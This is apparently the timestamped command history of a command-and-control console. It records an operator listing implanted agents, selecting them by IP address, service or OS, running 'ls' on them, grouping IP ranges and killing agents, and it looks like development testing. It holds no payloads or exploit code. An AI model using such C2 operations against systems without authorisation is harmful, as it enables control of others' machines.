4200 | # 2021-04-03 12:31:04.030157
4201 | +interact service ftp
4202 |
4203 | # 2021-04-03 12:31:05.303163
4204 | +agents
4205 |
4206 | # 2021-04-03 12:31:07.683318
4207 | +back
4208 |
4209 | # 2021-04-03 12:31:08.282068
4210 | +exit
4211 |
4212 | # 2021-04-03 12:48:57.797996
4213 | +interact service ftp
4214 |
4215 | # 2021-04-03 12:48:59.250820
4216 | +agents
4217 |
4218 | # 2021-04-03 12:49:00.381464
4219 | +help
4220 |
4221 | # 2021-04-03 12:49:02.372625
4222 | +ping
4223 |
4224 | # 2021-04-03 12:49:06.366214
4225 | +kill
4226 |
4227 | # 2021-04-03 12:49:19.495893
4228 | +interact service ftp
4229 |
4230 | # 2021-04-03 12:49:20.536782
4231 | +kill
4232 |
4233 | # 2021-04-03 12:49:28.000982
4234 | +help
4235 |
4236 | # 2021-04-03 12:49:29.791249
4237 | +kil
4238 |
4239 | # 2021-04-03 12:49:31.213821
4240 | +kill
4241 |
4242 | # 2021-04-03 12:49:35.993554
4243 | +help
4244 |
4245 | # 2021-04-03 12:49:37.607548
4246 | +ping
4247 |
4248 | # 2021-04-03 12:49:39.840000
4249 | +kill
4250 |
4251 | # 2021-04-03 12:49:44.805926
4252 | +agents
4253 |
4254 | # 2021-04-03 12:49:45.976077
4255 | +back
4256 |
4257 | # 2021-04-03 12:49:47.512246
4258 | +agents
4259 |
4260 | # 2021-04-03 12:49:49.286410
4261 | +exit
4262 |
4263 | # 2021-04-03 14:55:48.572045
4264 | +agents
4265 |
4266 | # 2021-04-03 14:55:52.107729
4267 | +interact service ftp
4268 |
4269 | # 2021-04-03 14:55:53.633015
4270 | +agents
4271 |
4272 | # 2021-04-03 14:55:54.710262
4273 | +back
4274 |
4275 | # 2021-04-03 14:55:57.664753
4276 | +interact s smb
4277 |
4278 | # 2021-04-03 14:56:14.195585
4279 | +agents
4280 |
4281 | # 2021-04-03 14:56:17.407625
4282 | +interact os windows
4283 |
4284 | # 2021-04-03 14:56:18.471861
4285 | +agents
4286 |
4287 | # 2021-04-03 14:56:19.314095
4288 | +back
4289 |
4290 | # 2021-04-03 14:56:22.022312
4291 | +interact os linxu
4292 |
4293 | # 2021-04-03 14:56:26.978746
4294 | +interact o linux
4295 |
4296 | # 2021-04-03 14:56:32.828789
4297 | +agents
4298 |
4299 | # 2021-04-03 14:56:34.705503
4300 | +exit
4301 |
4302 | # 2021-04-03 15:00:22.129267
4303 | +interact o linux
4304 |
4305 | # 2021-04-03 15:00:25.047997
4306 | +interact os windows
4307 |
4308 | # 2021-04-03 15:00:27.038121
4309 | +agents
4310 |
4311 | # 2021-04-03 15:00:29.601660
4312 | +back
4313 |
4314 | # 2021-04-03 15:00:33.598297
4315 | +agnet
4316 |
4317 | # 2021-04-03 15:00:34.730618
4318 | +agnets
4319 |
4320 | # 2021-04-03 15:00:37.781941
4321 | +agents
4322 |
4323 | # 2021-04-03 15:00:42.911648
4324 | +interact s ftp
4325 |
4326 | # 2021-04-03 15:00:44.385035
4327 | +agents
4328 |
4329 | # 2021-04-03 15:00:45.317261
4330 | +back
4331 |
4332 | # 2021-04-03 15:00:45.932612
4333 | +exit
4334 |
4335 | # 2021-04-03 15:01:39.101085
4336 | +interat
4337 |
4338 | # 2021-04-03 15:01:40.799050
4339 | +interact
4340 |
4341 | # 2021-04-03 15:01:44.620089
4342 | +interact bingus ftp
4343 |
4344 | # 2021-04-03 15:01:48.187698
4345 | +exit
4346 |
4347 | # 2021-04-03 15:03:33.266275
4348 | +interact a 8.8.8.8
4349 |
4350 | # 2021-04-03 15:03:41.235871
4351 | +interact agent 10.10.10.10
4352 |
4353 | # 2021-04-03 15:03:42.932958
4354 | +ping
4355 |
4356 | # 2021-04-03 15:03:44.250349
4357 | +back
4358 |
4359 | # 2021-04-03 15:03:44.900044
4360 | +exit
4361 |
4362 | # 2021-04-03 15:08:20.455363
4363 | +agents
4364 |
4365 | # 2021-04-03 15:08:28.926527
4366 | +interact agent 119.201.243.95
4367 |
4368 | # 2021-04-03 15:08:30.747261
4369 | +kill
4370 |
4371 | # 2021-04-03 15:08:34.140144
4372 | +back
4373 |
4374 | # 2021-04-03 15:08:34.966021
4375 | +agents
4376 |
4377 | # 2021-04-03 15:08:38.492207
4378 | +exit
4379 |
4380 | # 2021-04-03 15:09:20.300382
4381 | +interact agent 10.10.10.10
4382 |
4383 | # 2021-04-03 15:09:22.082641
4384 | +kill
4385 |
4386 | # 2021-04-03 15:09:25.734801
4387 | +agents
4388 |
4389 | # 2021-04-03 15:09:27.630745
4390 | +back
4391 |
4392 | # 2021-04-03 15:09:29.006543
4393 | +agents
4394 |
4395 | # 2021-04-03 15:09:30.734019
4396 | +exit
4397 |
4398 | # 2021-04-03 15:12:12.797456
4399 | +interact agent 10.10.10.10
4400 |
4401 | # 2021-04-03 15:12:14.051827
4402 | +kill
4403 |
4404 | # 2021-04-03 15:12:16.874053
4405 | +back
4406 |
4407 | # 2021-04-03 15:12:17.719882
4408 | +agents
4409 |
4410 | # 2021-04-03 15:12:20.278531
4411 | +exit
4412 |
4413 | # 2021-04-03 15:12:50.105542
4414 | +interact agent 10.10.10.10
4415 |
4416 | # 2021-04-03 15:12:51.099195
4417 | +kill
4418 |
4419 | # 2021-04-03 15:12:55.510903
4420 | +back
4421 |
4422 | # 2021-04-03 15:12:56.061258
4423 | +exit
4424 |
4425 | # 2021-04-03 15:13:21.986646
4426 | +interact agent 10.10.10.10
4427 |
4428 | # 2021-04-03 15:13:22.928048
4429 | +kill
4430 |
4431 | # 2021-04-03 15:13:26.727424
4432 | +agents
4433 |
4434 | # 2021-04-03 15:13:28.093153
4435 | +back
4436 |
4437 | # 2021-04-03 15:13:28.967359
4438 | +agents
4439 |
4440 | # 2021-04-03 15:13:30.511062
4441 | +agnets
4442 |
4443 | # 2021-04-03 15:13:32.021943
4444 | +agents
4445 |
4446 | # 2021-04-03 15:13:34.255022
4447 | +exit
4448 |
4449 | # 2021-04-03 15:14:57.012386
4450 | +interact agent 10.10.10.10
4451 |
4452 | # 2021-04-03 15:14:58.088716
4453 | +kill
4454 |
4455 | # 2021-04-03 15:15:01.294157
4456 | +back
4457 |
4458 | # 2021-04-03 15:15:02.489651
4459 | +agents
4460 |
4461 | # 2021-04-03 15:15:04.221745
4462 | +exit
4463 |
4464 | # 2021-04-03 15:17:45.785157
4465 | +interact agent 10.10.10.10
4466 |
4467 | # 2021-04-03 15:17:46.737325
4468 | +kill
4469 |
4470 | # 2021-04-03 15:17:50.024682
4471 | +back
4472 |
4473 | # 2021-04-03 15:17:52.115647
4474 | +agents
4475 |
4476 | # 2021-04-03 15:17:56.712945
4477 | +exit
4478 |
4479 | # 2021-04-03 15:18:10.119389
4480 | +interact agent 10.10.10.10
4481 |
4482 | # 2021-04-03 15:18:12.111578
4483 | +kill
4484 |
4485 | # 2021-04-03 15:18:16.025788
4486 | +agents
4487 |
4488 | # 2021-04-03 15:18:18.989458
4489 | +exit
4490 |
4491 | # 2021-04-03 15:20:01.618798
4492 | +interact agent 10.10.10.10
4493 |
4494 | # 2021-04-03 15:20:02.688203
4495 | +kill
4496 |
4497 | # 2021-04-03 15:20:05.294419
4498 | +exit
4499 |
4500 | # 2021-04-03 15:20:31.217810
4501 | +interact agent 10.10.10.10
4502 |
4503 | # 2021-04-03 15:20:32.260580
4504 | +kill
4505 |
4506 | # 2021-04-03 15:21:23.356599
4507 | +interact agent 10.10.10.10
4508 |
4509 | # 2021-04-03 15:21:24.561137
4510 | +kill
4511 |
4512 | # 2021-04-03 15:22:17.137110
4513 | +interact agent 10.10.10.10
4514 |
4515 | # 2021-04-03 15:22:18.227059
4516 | +kill
4517 |
4518 | # 2021-04-03 15:22:19.968565
4519 | +back
4520 |
4521 | # 2021-04-03 15:22:20.690397
4522 | +agents
4523 |
4524 | # 2021-04-03 15:22:22.213568
4525 | +exit
4526 |
4527 | # 2021-04-03 15:22:54.365325
4528 | +interact agent 10.10.10.10
4529 |
4530 | # 2021-04-03 15:22:55.428148
4531 | +kill
4532 |
4533 | # 2021-04-03 15:23:48.230325
4534 | +interact agent 10.10.10.10
4535 |
4536 | # 2021-04-03 15:23:49.701978
4537 | +kill
4538 |
4539 | # 2021-04-03 15:25:16.004717
4540 | +interact agent 10.10.10.10
4541 |
4542 | # 2021-04-03 15:25:17.193007
4543 | +kill
4544 |
4545 | # 2021-04-03 15:25:19.630785
4546 | +agents
4547 |
4548 | # 2021-04-03 15:25:20.285149
4549 | +back
4550 |
4551 | # 2021-04-03 15:25:21.572707
4552 | +agents
4553 |
4554 | # 2021-04-03 15:25:25.261809
4555 | +exit
4556 |
4557 | # 2021-04-03 15:27:28.931816
4558 | +interact agent 10.10.10.10
4559 |
4560 | # 2021-04-03 15:27:33.351389
4561 | +kill
4562 |
4563 | # 2021-04-03 15:27:35.939876
4564 | +back
4565 |
4566 | # 2021-04-03 15:27:36.680127
4567 | +agents
4568 |
4569 | # 2021-04-03 15:27:39.053863
4570 | +exit
4571 |
4572 | # 2021-04-03 15:28:08.911721
4573 | +agents
4574 |
4575 | # 2021-04-03 15:28:10.267111
4576 | +exit
4577 |
4578 | # 2021-04-03 15:28:33.027280
4579 | +interact agent 10.10.10.10
4580 |
4581 | # 2021-04-03 15:28:35.086595
4582 | +kill
4583 |
4584 | # 2021-04-03 15:28:36.790716
4585 | +back
4586 |
4587 | # 2021-04-03 15:28:37.434004
4588 | +agents
4589 |
4590 | # 2021-04-03 15:28:40.750664
4591 | +exit
4592 |
4593 | # 2021-04-03 15:46:58.795551
4594 | +db
4595 |
4596 | # 2021-04-03 15:46:59.801032
4597 | +help
4598 |
4599 | # 2021-04-03 15:47:13.569399
4600 | +group 180.65.8.1-244 service yeah
4601 |
4602 | # 2021-04-03 15:47:16.104756
4603 | +agents
4604 |
4605 | # 2021-04-03 15:47:18.278581
4606 | +back
4607 |
4608 | # 2021-04-03 15:47:33.150405
4609 | +agents
4610 |
4611 | # 2021-04-03 15:47:37.965117
4612 | +db
4613 |
4614 | # 2021-04-03 15:47:52.918245
4615 | +group 183.1-200.123.4 os linux
4616 |
4617 | # 2021-04-03 15:47:54.954659
4618 | +agents
4619 |
4620 | # 2021-04-03 15:47:56.002791
4621 | +back
4622 |
4623 | # 2021-04-03 15:47:57.180517
4624 | +exit
4625 |
4626 | # 2021-04-03 15:48:09.195495
4627 | +interact os linux
4628 |
4629 | # 2021-04-03 15:48:10.766596
4630 | +agents
4631 |
4632 | # 2021-04-03 15:48:12.049150
4633 | +back
4634 |
4635 | # 2021-04-03 15:48:13.052040
4636 | +agents
4637 |
4638 | # 2021-04-03 15:48:20.226010
4639 | +interact s yeah
4640 |
4641 | # 2021-04-03 15:48:21.992137
4642 | +agents
4643 |
4644 | # 2021-04-03 15:48:23.112006
4645 | +back
4646 |
4647 | # 2021-04-03 15:48:23.766675
4648 | +exit
4649 |
4650 | # 2021-04-03 15:52:27.903463
4651 | +db
4652 |
4653 | # 2021-04-03 15:52:29.637824
4654 | +group 183.1-200.123.4 os linux
4655 |
4656 | # 2021-04-03 15:52:58.303338
4657 | +db
4658 |
4659 | # 2021-04-03 15:52:59.387836
4660 | +group 183.1-200.123.4 os linux
4661 |
4662 | # 2021-04-03 15:53:01.628020
4663 | +agents
4664 |
4665 | # 2021-04-03 15:53:04.480043
4666 | +back
4667 |
4668 | # 2021-04-03 15:53:05.109983
4669 | +exit
4670 |
4671 | # 2021-04-03 15:54:41.545541
4672 | +agents
4673 |
4674 | # 2021-04-03 15:55:07.275472
4675 | +exit
4676 |
4677 | # 2021-04-03 15:55:19.675089
4678 | +agents
4679 |
4680 | # 2021-04-03 15:55:24.934224
4681 | +exit
4682 |
4683 | # 2021-04-03 15:56:23.221753
4684 | +agents
4685 |
4686 | # 2021-04-03 15:56:27.346947
4687 | +exit
4688 |
4689 | # 2021-04-03 16:00:35.275329
4690 | +agents
4691 |
4692 | # 2021-04-03 16:00:44.686010
4693 | +db
4694 |
4695 | # 2021-04-03 16:00:54.983141
4696 | +group 10.5.6.1-215 service bingus
4697 |
4698 | # 2021-04-03 16:00:56.872542
4699 | +agents
4700 |
4701 | # 2021-04-03 16:01:06.110290
4702 | +interact s bingus
4703 |
4704 | # 2021-04-03 16:01:15.166084
4705 | +interact service bingus
4706 |
4707 | # 2021-04-03 16:01:20.665602
4708 | +interact service ftp
4709 |
4710 | # 2021-04-03 16:01:22.436758
4711 | +bac
4712 |
4713 | # 2021-04-03 16:01:28.544448
4714 | +interact s bingus
4715 |
4716 | # 2021-04-03 16:01:30.554983
4717 | +bac
4718 |
4719 | # 2021-04-03 16:01:31.548790
4720 | +back
4721 |
4722 | # 2021-04-03 16:01:35.250643
4723 | +interact s bingus
4724 |
4725 | # 2021-04-03 16:01:37.187912
4726 | +ping
4727 |
4728 | # 2021-04-03 16:04:43.507936
4729 | +interact s bingus
4730 |
4731 | # 2021-04-03 16:04:44.315719
4732 | +ping
4733 |
4734 | # 2021-04-03 16:05:13.125719
4735 | +interact s bingus
4736 |
4737 | # 2021-04-03 16:05:14.740428
4738 | +ping
4739 |
4740 | # 2021-04-03 16:05:27.352581
4741 | +agents
4742 |
4743 | # 2021-04-03 16:05:33.916522
4744 | +kill
4745 |
4746 | # 2021-04-03 16:06:46.118393
4747 | +interact s bingus
4748 |
4749 | # 2021-04-03 16:06:47.206867
4750 | +kill
4751 |
4752 | # 2021-04-03 16:06:53.447239
4753 | +agents
4754 |
4755 | # 2021-04-03 16:06:54.285311
4756 | +back
4757 |
4758 | # 2021-04-03 16:06:55.217823
4759 | +agents
4760 |
4761 | # 2021-04-03 16:07:09.426106
4762 | +exit
4763 |
4764 | # 2021-04-03 16:07:26.558132
4765 | +interact s bingus
4766 |
4767 | # 2021-04-03 16:07:27.533909
4768 | +kill
4769 |
4770 | # 2021-04-03 16:07:37.683057
4771 | +cmd
4772 |
4773 | # 2021-04-03 16:07:42.091652
4774 | +ls
4775 |
4776 | # 2021-04-03 16:07:45.836513
4777 | +back
4778 |
4779 | # 2021-04-03 16:07:49.042894
4780 | +exit
4781 |
4782 | # 2021-04-03 16:08:00.261897
4783 | +shutdown
4784 |
4785 | # 2021-04-03 16:12:09.163112
4786 | +exit
4787 |
4788 | # 2021-04-03 16:19:50.836936
4789 | +agents
4790 |
4791 | # 2021-04-03 16:20:44.127792
4792 | +interact s bingus
4793 |
4794 | # 2021-04-03 16:20:48.400128
4795 | +interact a 8.8.8.8
4796 |
4797 | # 2021-04-03 16:20:50.250449
4798 | +agents
4799 |
4800 | # 2021-04-03 16:20:57.455376
4801 | +exit
4802 |
4803 | # 2021-04-03 16:21:50.587801
4804 | +clear
4805 |
4806 | # 2021-04-03 16:21:51.441694
4807 | +agents
4808 |
4809 | # 2021-04-03 16:22:54.157135
4810 | +exit
4811 |
4812 | # 2021-04-03 16:23:49.882600
4813 | +agents
4814 |
4815 | # 2021-04-03 16:24:02.551270
4816 | +group 119.194.220.154 service malware
4817 |
4818 | # 2021-04-03 16:24:05.815356
4819 | +db
4820 |
4821 | # 2021-04-03 16:24:07.487066
4822 | +group 119.194.220.154 service malware
4823 |
4824 | # 2021-04-03 16:24:08.518920
4825 | +back
4826 |
4827 | # 2021-04-03 16:24:09.775894
4828 | +agents
4829 |
4830 | # 2021-04-03 16:27:06.251256
4831 | +exit
4832 |
4833 | # 2021-04-03 16:29:06.441808
4834 | +agents
4835 |
4836 | # 2021-04-03 16:29:25.838358
4837 | +db
4838 |
4839 | # 2021-04-03 16:29:30.981628
4840 | +group 10.5.6.1-215 service bingus
4841 |
4842 | # 2021-04-03 16:29:32.663671
4843 | +agents
4844 |
4845 | # 2021-04-03 16:29:33.513532
4846 | +back
4847 |
4848 | # 2021-04-03 16:29:34.713751
4849 | +agents
4850 |
4851 | # 2021-04-03 16:29:43.187701
4852 | +interact service bingus
4853 |
4854 | # 2021-04-03 16:29:45.970109
4855 | +ping
4856 |
4857 | # 2021-04-03 16:29:58.438012
4858 | +back
4859 |
4860 | # 2021-04-03 16:30:00.208042
4861 | +agents
4862 |
4863 | # 2021-04-03 16:30:33.612498
4864 | +interact service bingus
4865 |
4866 | # 2021-04-03 16:30:34.724193
4867 | +agents
4868 |
4869 | # 2021-04-03 16:30:44.271979
4870 | +clear
4871 |
4872 | # 2021-04-03 16:30:45.227977
4873 | +agents
4874 |
4875 | # 2021-04-03 16:30:50.750234
4876 | +ping
4877 |
4878 | # 2021-04-03 16:30:52.339025
4879 | +back
4880 |
4881 | # 2021-04-03 16:30:53.279880
4882 | +agents
4883 |
4884 | # 2021-04-03 16:30:58.895605
4885 | +db
4886 |
4887 | # 2021-04-03 16:30:59.962474
4888 | +removeall
4889 |
4890 | # 2021-04-03 16:31:02.801807
4891 | +agents
4892 |
4893 | # 2021-04-03 16:31:03.617668
4894 | +abck
4895 |
4896 | # 2021-04-03 16:31:04.706558
4897 | +back
4898 |
4899 | # 2021-04-03 16:31:05.415652
4900 | +exit
4901 |
4902 | # 2021-04-03 17:07:58.852321
4903 | +help
4904 |
4905 | # 2021-04-03 17:12:29.063772
4906 | +agents
4907 |
4908 | # 2021-04-03 17:12:30.439737
4909 | +exit
4910 |
4911 | # 2021-04-03 19:11:21.981440
4912 | +agents
4913 |
4914 | # 2021-04-03 19:11:26.116078
4915 | +exit
4916 |
4917 | # 2021-04-03 19:14:55.454747
4918 | +agents
4919 |
4920 | # 2021-04-03 19:15:06.956354
4921 | +db
4922 |
4923 | # 2021-04-03 19:15:09.906092
4924 | +group 10.5.6.1-215 service bingus
4925 |
4926 | # 2021-04-03 19:15:11.846188
4927 | +agents
4928 |
4929 | # 2021-04-03 19:15:13.068030
4930 | +back
4931 |
4932 | # 2021-04-03 19:15:14.649616
4933 | +interact service bingus
4934 |
4935 | # 2021-04-03 19:15:16.112230
4936 | +ping
4937 |
4938 | # 2021-04-03 19:15:21.268108
4939 | +back
4940 |
4941 | # 2021-04-03 19:15:23.214301
4942 | +shutdown
4943 |
4944 | # 2021-04-03 19:16:10.845552
4945 | +agents
4946 |
4947 | # 2021-04-03 19:16:17.508773
4948 | +exit
4949 |
4950 | # 2021-04-03 22:15:47.193411
4951 | +agents
4952 |
4953 | # 2021-04-03 22:15:55.158831
4954 | +interact a 192.168.183.2
4955 |
4956 | # 2021-04-03 22:15:56.316008
4957 | +cmd
4958 |
4959 | # 2021-04-03 22:15:57.130747
4960 | +ls
4961 |
4962 | # 2021-04-03 22:16:18.267681
4963 | +interact a 192.168.183.2
4964 |
4965 | # 2021-04-03 22:16:19.857287
4966 | +ping
4967 |
4968 | # 2021-04-03 22:50:54.185676
4969 | +exit
4970 |
4971 | # 2021-04-03 22:51:33.918796
4972 | +interact a 129.21.103.1
4973 |
4974 | # 2021-04-03 22:52:43.222132
4975 | +db
4976 |
4977 | # 2021-04-03 22:52:44.015611
4978 | +removeall
4979 |
4980 | # 2021-04-03 22:52:45.788191
4981 | +back
4982 |
4983 | # 2021-04-03 22:52:46.489670
4984 | +exit
4985 |
4986 | # 2021-04-03 22:53:44.538928
4987 | +interact a 129.21.103.1
4988 |
4989 | # 2021-04-03 22:53:45.446274
4990 | +cmd
4991 |
4992 | # 2021-04-03 22:53:45.983352
4993 | +ls
4994 |
4995 | # 2021-04-03 22:53:52.324037
4996 | +ls -la
4997 |
4998 | # 2021-04-03 22:53:56.750575
4999 | +back
5000 |
5001 | # 2021-04-03 22:53:58.018235
5002 | +ping
5003 |
5004 | # 2021-04-03 22:54:02.321550
5005 | +back
5006 |
5007 | # 2021-04-03 22:54:03.154456
5008 | +exit
5009 |
5010 | # 2021-04-03 22:54:57.692215
5011 | +interact a 129.21.103.1
5012 |
5013 | # 2021-04-03 22:54:58.320615
5014 | +cmd
5015 |
5016 | # 2021-04-03 22:54:58.704621
5017 | +ls
5018 |
5019 | # 2021-04-03 22:55:00.340033
5020 | +ls -la
5021 |
5022 | # 2021-04-03 22:55:01.390684
5023 | +back
5024 |
5025 | # 2021-04-03 22:55:03.821615
5026 | +ping
5027 |
5028 | # 2021-04-03 22:55:05.707848
5029 | +kill
5030 |
5031 | # 2021-04-03 22:55:08.236596
5032 | +back
5033 |
5034 | # 2021-04-03 22:55:09.804493
5035 | +agents
5036 |
5037 | # 2021-04-03 22:55:11.454499
5038 | +exit
5039 |
5040 | # 2021-04-03 22:59:27.011223
5041 | +interact a 129.21.103.1
5042 |
5043 | # 2021-04-03 22:59:27.906332
5044 | +cmd
5045 |
5046 | # 2021-04-03 22:59:29.015475
5047 | +ls -la
5048 |
5049 | # 2021-04-03 22:59:31.000735
5050 | +back
5051 |
5052 | # 2021-04-03 22:59:32.664604
5053 | +ping
5054 |
5055 | # 2021-04-03 22:59:35.254604
5056 | +agents
5057 |
5058 | # 2021-04-03 22:59:36.588308
5059 | +back
5060 |
5061 | # 2021-04-03 22:59:37.275344
5062 | +agents
5063 |
5064 | # 2021-04-03 22:59:40.971376
5065 | +exit
5066 |
5067 | # 2021-04-06 11:19:48.344635
5068 | +help
5069 |
5070 | # 2021-04-06 11:20:57.062947
5071 | +agents
5072 |
5073 | # 2021-04-06 11:21:03.383703
5074 | +interact a 129.21.103.1
5075 |
5076 | # 2021-04-06 11:21:05.641740
5077 | +ping
5078 |
5079 | # 2021-04-06 11:21:09.444139
5080 | +back
5081 |
5082 | # 2021-04-06 11:21:13.465728
5083 | +help
5084 |
5085 | # 2021-04-06 11:21:24.652389
5086 | +db
5087 |
5088 | # 2021-04-06 11:21:26.566184
5089 | +agents
5090 |
5091 | # 2021-04-06 11:21:27.713342
5092 | +help
5093 |
5094 | # 2021-04-06 11:21:44.340937
5095 | +group 129.21.1-104.1 os macos
5096 |
5097 | # 2021-04-06 11:21:46.619789
5098 | +agents
5099 |
5100 | # 2021-04-06 11:22:05.043875
5101 | +back
5102 |
5103 | # 2021-04-06 11:22:06.610344
5104 | +agents
5105 |
5106 | # 2021-04-06 11:22:11.886319
5107 | +db
5108 |
5109 | # 2021-04-06 11:22:12.845103
5110 | +removeall
5111 |
5112 | # 2021-04-06 11:22:15.138781
5113 | +agent
5114 |
5115 | # 2021-04-06 11:22:16.377402
5116 | +back
5117 |
5118 | # 2021-04-06 11:22:17.081602
5119 | +agents
5120 |
5121 | # 2021-04-06 11:22:18.561768
5122 | +exit
5123 |
5124 | # 2021-04-06 11:25:51.466265
5125 | +help
5126 |
5127 | # 2021-04-06 11:25:53.906234
5128 | +db
5129 |
5130 | # 2021-04-06 11:25:54.423407
5131 | +help
5132 |
5133 | # 2021-04-06 11:25:55.427006
5134 | +back
5135 |
5136 | # 2021-04-06 11:25:57.386398
5137 | +interact a 129.21.103.1
5138 |
5139 | # 2021-04-06 11:26:05.439980
5140 | +interact a 112.223.63.244
5141 |
5142 | # 2021-04-06 11:26:07.445263
5143 | +help
5144 |
5145 | # 2021-04-06 11:26:08.450521
5146 | +cmd
5147 |
5148 | # 2021-04-06 11:26:09.129723
5149 | +help
5150 |
5151 | # 2021-04-06 11:26:10.295650
5152 | +back
5153 |
5154 | # 2021-04-06 11:26:13.512782
5155 | +eixt
5156 |
5157 | # 2021-04-06 11:26:14.531411
5158 | +exit
5159 |
5160 | # 2021-04-06 11:40:44.958972
5161 | +agents
5162 |
5163 | # 2021-04-06 11:44:09.580677
5164 | +exit
5165 |
5166 | # 2021-04-06 11:44:26.702918
5167 | +agents
5168 |
5169 | # 2021-04-06 11:44:53.908894
5170 | +db
5171 |
5172 | # 2021-04-06 11:44:55.372938
5173 | +back
5174 |
5175 | # 2021-04-06 11:45:00.661323
5176 | +db
5177 |
5178 | # 2021-04-06 11:45:09.192975
5179 | +group 10.5.6.1-215 service bongo
5180 |
5181 | # 2021-04-06 11:45:11.781932
5182 | +agents
5183 |
5184 | # 2021-04-06 11:45:13.240723
5185 | +back
5186 |
5187 | # 2021-04-06 11:45:22.085045
5188 | +interact s bongo
5189 |
5190 | # 2021-04-06 11:45:24.485314
5191 | +agents
5192 |
5193 | # 2021-04-06 11:45:26.626859
5194 | +help
5195 |
5196 | # 2021-04-06 11:45:28.164501
5197 | +ping
5198 |
5199 | # 2021-04-06 11:45:32.776823
5200 | +help
5201 |
5202 | # 2021-04-06 11:45:41.568531
5203 | +kill
5204 |
5205 | # 2021-04-06 11:45:43.995082
5206 | +back
5207 |
5208 | # 2021-04-06 11:45:45.033053
5209 | +agents
5210 |
5211 | # 2021-04-06 11:45:51.919414
5212 | +shutdown
5213 |
--------------------------------------------------------------------------------